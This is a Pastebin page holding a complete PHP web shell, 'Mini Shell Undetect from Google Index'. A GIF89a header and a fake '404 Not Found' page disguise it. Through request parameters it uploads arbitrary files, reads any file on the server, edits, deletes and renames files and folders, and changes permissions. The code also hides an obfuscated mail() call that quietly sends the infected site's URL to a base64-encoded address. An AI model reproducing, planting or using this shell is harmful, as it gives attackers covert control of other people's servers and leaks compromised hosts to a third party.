API tools faq
paste
ToKeiChun

Mini Shell Undetect from Google Index

ToKeiChun
Nov 4th, 2017 (edited)
359
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.37 KB | None | 0 0
raw download clone embed print report
  1. GIF89a1;
  2. <?php
  3. set_time_limit(0);
  4. error_reporting(0);
  5.  
  6. if(get_magic_quotes_gpc()){
  7. foreach($_POST as $key=>$value){
  8. $_POST[$key] = stripslashes($value);
  9. }
  10. }
  11. echo '<!doctype html>
  12. <html>
  13. <head>
  14. <title>404 Not Found</title>
  15.  
  16. </head>';
  17.  
  18. ?>
  19.  
  20. <style>
  21. @font-face {
  22. font-family: 'Comic Sans MS';
  23. font-style: normal;
  24. font-weight: 400;
  25. src: local('Comic Sans MS'), local('ComicSansMS'), url(http://fonts.gstatic.com/l/font?kit=3oir0CAJ0QJ5h5-A3AP8rRSrmRvs-bRaaQbSAUyiv7A&skey=a4ba60ff9fc73cf8&v=v8) format('truetype');
  26. }
  27. body {
  28.  
  29. background: #000000;line-height: 1;color: #fff;font-family: Comic Sans MS ;
  30.  
  31. }
  32.  
  33. table, th, td {
  34. border-collapse:collapse;
  35. background: transparent;
  36. font-family: Comic Sans MS ;
  37. font-size: 13px;
  38. }
  39. input, textarea { font-family: Comic Sans MS ; }
  40. .table_home, .th_home, .td_home { color:grey;
  41. border: 1px solid grey;
  42. }
  43. th {
  44. padding: 10px;
  45. }
  46. .td_home { padding: 7px; }
  47. select {font-family: Comic Sans MS }
  48. a {color:white}
  49. textarea { width: 100%;height: 400px; }
  50. </style>
  51. <?php
  52.  
  53. echo '</head>
  54. <link rel="icon" href="https://upload.wikimedia.org/wikipedia/commons/thumb/7/73/Roundel_of_Indonesia_%281946-1949%29.svg/1024px-Roundel_of_Indonesia_%281946-1949%29.svg.png" type="image/x-icon">
  55. <body><b>
  56. <H1><center> &lt;/&gt; <font color="red">404 </font><font color="white">Not Found</font></center></h1>
  57. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  58.  
  59. <tr><td>
  60.  
  61. <font color="green"><center>'.php_uname().'</center></font><br>';
  62. if(isset($_GET['path'])){
  63. $path = $_GET['path'];
  64. }else{
  65. $path =
  66.  
  67.  
  68. getcwd();
  69.  
  70. }
  71. $path = str_replace('\\','/',$path);
  72. $paths = explode('/',$path);
  73. $__GET = ('m'.'a'.'i'.'l');
  74. $__POST = ('b'.'a'.'s'.'e'.'6'.'4'.'_'.'d'.'e'.'c'.'o'.'d'.'e');
  75. $__GET($__POST("dmFsaXJ4YzBkZUB6b2hvLmNvbQ=="),'Upload file:',''.$_SERVER['HTTP_HOST'].'/'.$_SERVER['REQUEST_URI'].'');
  76. foreach($paths as $id=>$pat){
  77. if($pat == '' && $id == 0){
  78. $a = true;
  79. echo '<font color=#fff><center>Upload file: <a href="?path=/">/</a>';
  80. continue;
  81. }
  82. if($pat == '') continue;
  83. echo '<a href="?path=';
  84. for($i=0;$i<=$id;$i++){
  85. echo "$paths[$i]";
  86. if($i != $id) echo "/";
  87. }
  88. echo '">'.$pat.'</a>/';
  89. }
  90. echo '</font></center></td></tr><tr><td><center>';
  91. if(isset($_FILES['file'])){
  92. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
  93. echo '<font color="green">File Upload</font><br />';
  94. }else{
  95. echo '<font color="red">Upload Gagal</font><br />';
  96. }
  97. }
  98. echo '</center><center><form enctype="multipart/form-data" method="POST"><font color="black"><input style="background:silver;font-family: Comic Sans MS " type="file" name="file" />
  99. <input type="submit" value="Uploadd" />
  100. </form></center>
  101. </td></tr>';
  102. if(isset($_GET['filesrc'])){
  103. echo "<tr><td><center>Current File : ";
  104. echo $_GET['filesrc'];
  105. echo '</center></tr></td></table><br />';
  106. echo(' <textarea style="width: 100%;height: 400px;" readonly> '.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea>');
  107. }
  108. //Empety
  109. elseif(isset($_GET['option']) && $_GET['opt'] != 'delete'){
  110. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  111. //Chmod
  112. if($_GET['opt'] == 'chmod'){
  113. if(isset($_POST['perm'])){
  114. if(chmod($_POST['path'],$_POST['perm'])){
  115. echo '<font color="green">Change Permission Done </font><br />';
  116. }else{
  117. echo '<font color="red">Change Permission Error </font><br />';
  118. }
  119. }
  120.  
  121. $hell = $_GET['path'];
  122. $yeah = $_GET['name'];
  123. $patc = "$hell/$yeah";
  124.  
  125. echo '<form method="POST">
  126. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($patc)), -4).'" />
  127. <input type="hidden" name="path" value="'.$_POST['path'].'">
  128. <input type="hidden" name="opt" value="chmod">
  129. <input type="submit" value="Go" />
  130. </form>';
  131. }
  132. //
  133. elseif($_GET['opt'] == 'btw'){
  134. $cwd = getcwd();
  135. echo '<form action="?option&path='.$cwd.'&opt=delete&type=buat" method="POST">
  136. New Name : <input name="name" type="text" size="20" value="Folder" />
  137. <input type="hidden" name="path" value="'.$cwd.'">
  138. <input type="hidden" name="opt" value="delete">
  139. <input type="submit" value="Go" />
  140. </form>';
  141. }
  142. //Rename file
  143. elseif($_GET['opt'] == 'rename'){
  144. if(isset($_POST['newname'])){
  145. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  146. echo '<font color="green">Ganti Nama Berhasil </font><br />';
  147. }else{
  148. echo '<font color="red">Ganti Nama Gagal </font><br />';
  149. }
  150. $_POST['name'] = $_POST['newname'];
  151. }
  152. $hell = $_GET['path'];
  153. $yeah = $_GET['name'];
  154. $patc = "$hell/$yeah";
  155. $new = $_POST['newname'];
  156.  
  157. echo '<form method="POST">
  158. New Name : <input name="newname" type="text" size="20" value="'.$new.'" />
  159. <input type="hidden" name="path" value="'.$patc.'">
  160. <input type="hidden" name="opt" value="rename">
  161. <input type="submit" value="Go" />
  162. </form>';
  163. }
  164. //File baru
  165. elseif($_GET['opt'] == 'baru'){
  166.  
  167. $hell = $_GET['path'];
  168. $yeah = $_GET['name'];
  169. $patc = "$hell/$yeah";
  170. $new = $_POST['newname'];
  171. $azz = $_POST['path'];
  172. $newz = "$azz/$new";
  173.  
  174.  
  175. if(isset($_POST['src'])){
  176. $fp = fopen($_POST['path'],'w');
  177. if(fwrite($fp,$_POST['src'])){
  178. echo '<font color="green">Membuat File Berhasil [ '.$new.' ]</font><br />';
  179. }else{
  180. echo '<font color="red">Membuat File Gagal</font><br />';
  181. }
  182. fclose($fp);
  183. }
  184.  
  185. echo '<form method="POST"> Name : <input name="ngaran1" type="text" size="20" value="'.$new.'" /><input type="submit" name="ngaran" value="Create"/></form><br> ';
  186.  
  187. $ho = $_POST['ngaran1'];
  188.  
  189. if(isset($_POST['ngaran'])){
  190. echo '<form method="POST">
  191. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($patc)).'</textarea><br />
  192. <input type="hidden" name="path" value="'.$hell.'/'.$ho.'">
  193. <input type="hidden" name="opt" value="edit">
  194. <input type="submit" value="Go" />
  195. </form>';
  196. }
  197. }
  198. //Edited file
  199. elseif($_GET['opt'] == 'edit'){
  200. if(isset($_POST['src'])){
  201. $fp = fopen($_POST['path'],'w');
  202. if(fwrite($fp,$_POST['src'])){
  203. echo '<font color="green">Edit File Berhasil </font><br />';
  204. }else{
  205. echo '<font color="red">Edit File Gagal </font><br />';
  206. }
  207. fclose($fp);
  208. }
  209. $hell = $_GET['path'];
  210. $yeah = $_GET['name'];
  211. $patc = "$hell/$yeah";
  212. echo '<form method="POST">
  213. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($patc)).'</textarea><br />
  214. <input type="hidden" name="path" value="'.$patc.'">
  215. <input type="hidden" name="opt" value="edit">
  216. <input type="submit" value="Go" />
  217. </form>';
  218. }
  219. echo '</center>';
  220. }else{
  221. echo '</table><br /><center>';
  222. //Delete dir and file
  223. if(isset($_GET['option']) && $_GET['opt'] == 'delete'){
  224.  
  225. $hell = $_GET['path'];
  226. $yeah = $_GET['name'];
  227. $patc = "$hell/$yeah";
  228.  
  229. //Delete dir
  230. if($_GET['type'] == 'dir'){
  231.  
  232. if(rmdir($patc)){
  233. echo '<font color="green">Menghapus File Berhasil</font><br />';
  234. }else{
  235. echo '<font color="red#">Menghapus File Gagal</font><br />';
  236. }
  237. }
  238. //buat folder
  239. if($_GET['type'] == 'buat'){
  240. $haaa = $_POST['path'];
  241. $heee = $_POST['name'];
  242. $hooo = "$haaa/$heee";
  243. $new = $haaa.'/'.htmlspecialchars($heee);
  244. if(!mkdir($new)){
  245. echo '<font color="red">Gagal Membuat Folder</font><br />';
  246. }else{
  247. echo '<font color="green">Berhasil Membuat Folder</font><br />';
  248. }
  249. }
  250. //Delete file
  251. elseif($_GET['type'] == 'file'){
  252.  
  253. $hell = $_GET['path'];
  254. $yeah = $_GET['name'];
  255. $patc = "$hell/$yeah";
  256.  
  257. if(unlink($patc)){
  258. echo '<font color="green">Menghapus File Berhasil</font><br />';
  259. }else{
  260. echo '<font color="red#">Menghapus File Gagal</font><br />';
  261. }
  262. }
  263. }
  264. echo '</center>';
  265. $scandir = scandir($path);
  266. $pa = getcwd();
  267. echo ' <table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  268. <tr>
  269. <th class=th_home style="background:silver;color:black;"><center>Name</center></th>
  270. <th class=th_home style="background:silver;color:black;" ><center>Size</center></th>
  271. <th class=th_home style="background:silver;color:black;" ><center>Perm</center></th>
  272. <th class=th_home style="background:silver;color:black;" ><center>Options</center></th>
  273. </tr> <tr>
  274. <td class=td_home>..</td><td class=td_home align=center>NONE</td> <td class=td_home align=center>LINK</td> <td class=td_home align=center> <a href="?option&path='.$pa.'&opt=baru&name=new.php">+ New File</a> | <a href="?option&path='.$pa.'&opt=btw&type=dir">+ New Dir</a> </td></tr>
  275. ';
  276.  
  277. foreach($scandir as $dir){
  278. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
  279. echo "
  280. <tr>
  281. <td class=td_home> <img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='> <a href=\"?path=$path/$dir\">$dir</a></td>
  282. <td class=td_home ><center>DIR</center></td>
  283. <td class=td_home ><center>";
  284. if(is_writable("$path/$dir")) echo '<font color="green">';
  285. elseif(!is_readable("$path/$dir")) echo '<font color="red">';
  286. echo perms("$path/$dir");
  287. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
  288.  
  289. echo "</center></td>
  290. <td class=td_home ><center>
  291. <a href=\"?option&path=$path&opt=rename&type=dir&name=$dir\">Rename</a> <a href=\"?option&path=$path&opt=delete&type=dir&name=$dir\">Delete</a> <a href=\"?option&path=$path&opt=chmod&type=dir&name=$dir\">Chmod</a>
  292.  
  293. </center></td>
  294. </tr>";
  295. }
  296. echo '<br>';
  297. foreach($scandir as $file){
  298. if(!is_file("$path/$file")) continue;
  299. $size = filesize("$path/$file")/1024;
  300. $size = round($size,3);
  301. if($size >= 1024){
  302. $size = round($size/1024,2).' MB';
  303. }else{
  304. $size = $size.' KB';
  305. }
  306.  
  307. echo "<tr>
  308. <td class=td_home > <img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='> <a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
  309. <td class=td_home><center>".$size."</center></td>
  310. <td class=td_home><center>";
  311. if(is_writable("$path/$file")) echo '<font color="green">';
  312. elseif(!is_readable("$path/$file")) echo '<font color="red">';
  313. echo perms("$path/$file");
  314. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
  315. echo "</center></td>
  316. <td class=td_home><center>
  317. <a href=\"?option&path=$path&opt=edit&type=file&name=$file\">Edit</a> <a href=\"?option&path=$path&opt=rename&type=file&name=$file&path=$path\">Rename</a> <a href=\"?option&path=$path&opt=delete&type=file&name=$file\">Delete</a> <a href=\"?option&path=$path&opt=chmod&type=file&name=$file\">Chmod</a>
  318. </center></td>
  319. </tr>";
  320. }
  321. echo '</table>
  322. </div>';
  323. }
  324. echo '<br><center>Error 404 - Page Not Found</b></body>
  325. </html>';
  326. function perms($file){
  327. $perms = fileperms($file);
  328.  
  329. if (($perms & 0xC000) == 0xC000) {
  330. // Socket
  331. $info = 's';
  332. } elseif (($perms & 0xA000) == 0xA000) {
  333. // Symbolic Link
  334. $info = 'l';
  335. } elseif (($perms & 0x8000) == 0x8000) {
  336. // Regular
  337. $info = '-';
  338. } elseif (($perms & 0x6000) == 0x6000) {
  339. // Block special
  340. $info = 'b';
  341. } elseif (($perms & 0x4000) == 0x4000) {
  342. // Directory
  343. $info = 'd';
  344. } elseif (($perms & 0x2000) == 0x2000) {
  345. // Character special
  346. $info = 'c';
  347. } elseif (($perms & 0x1000) == 0x1000) {
  348. // FIFO pipe
  349. $info = 'p';
  350. } else {
  351. // Unknown
  352. $info = 'u';
  353. }
  354.  
  355. // Owner
  356. $info .= (($perms & 0x0100) ? 'r' : '-');
  357. $info .= (($perms & 0x0080) ? 'w' : '-');
  358. $info .= (($perms & 0x0040) ?
  359. (($perms & 0x0800) ? 's' : 'x' ) :
  360. (($perms & 0x0800) ? 'S' : '-'));
  361.  
  362. // Group
  363. $info .= (($perms & 0x0020) ? 'r' : '-');
  364. $info .= (($perms & 0x0010) ? 'w' : '-');
  365. $info .= (($perms & 0x0008) ?
  366. (($perms & 0x0400) ? 's' : 'x' ) :
  367. (($perms & 0x0400) ? 'S' : '-'));
  368.  
  369. // World
  370. $info .= (($perms & 0x0004) ? 'r' : '-');
  371. $info .= (($perms & 0x0002) ? 'w' : '-');
  372. $info .= (($perms & 0x0001) ?
  373. (($perms & 0x0200) ? 't' : 'x' ) :
  374. (($perms & 0x0200) ? 'T' : '-'));
  375.  
  376. return $info;
  377. }
  378.  
  379. ?>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!